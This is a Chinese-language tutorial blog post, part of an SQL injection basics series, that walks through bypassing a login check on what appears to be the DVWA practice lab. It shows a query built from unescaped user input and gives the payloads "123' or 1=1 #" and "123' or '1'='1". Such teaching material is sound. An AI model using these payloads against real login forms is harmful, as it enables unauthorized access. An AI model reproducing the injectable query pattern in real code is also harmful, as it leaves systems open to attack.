SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证
2018-12-26 17:04
1061 查看
DVWA->SQL Injection
[code]//后台sql语句 select * from users where username='$name' and password='$pwd';
当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时:
[code]//实际执行语句 select * from users where username='admin' and password='123';
- 使用注释绕过验证
在用户名中输入 123' or 1=1 #,密码中同样输入 123' or 1=1 #
按照 Mysql 语法,# 后面的内容会被注释掉,所以密码也可以不填。
[code]//示例一 SELECT first_name, last_name FROM users WHERE user_id = '123' or 1=1 #'; //示例二 select * from users where username='123' or 1=1 #' and password='123' or 1=1 #'; select * from users where username='123' or 1=1; #' and password='123' or 1=1; #';
- 不做注释,手动闭合绕过验证
[code]//构造输入 123' or '1'='1 select * from users where username='123' or '1'='1' and password='123' or '1'='1'
两个 or 语句使 and 前后两个判断恒等于真,所以能够成功登录。
相关文章推荐
- SQL数据注入漏洞-绕过登陆验证
- SQL数据注入漏洞-绕过登陆验证
- SQL另类注入之绕过后台登陆验证
- SQL 注入基础系列1——猜解数据库
- python学习系列之python装饰器基础(3)---装饰器实现用户登录验证
- 利用SQL漏洞强行登录及防范方法
- 利用Request对象的包解析漏洞绕过防注入程序(hackbar)
- Grub2登录绕过验证漏洞
- Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
- [SQL SERVER系列]读书笔记之SQL注入漏洞和SQL调优
- Android基础学习总结(十二)——利用Bmob实现用户账户体系(注册、登录、验证等)
- 网页基础第1课之“ 利用 session 实现循环3次登录验证”
- [SQL SERVER系列]读书笔记之SQL注入漏洞和SQL调优
- SQL注入全过程,含实例初步注入--绕过验证,直接登录安全较低公司网站登陆框如下:可以看到除了账号密码之外
- 利用SQL漏洞强行登录及防范方法
- htaccess文件解析漏洞和利用Tamper绕过防注入代码
- SQL通用防注入系统asp版 插一句话漏洞利用
- SQL另类注入之绕过后台登陆验证
- 如何防止ASP.NET应用程序中的SQL注入安全漏洞
- Phpspy 2011继续身份验证绕过漏洞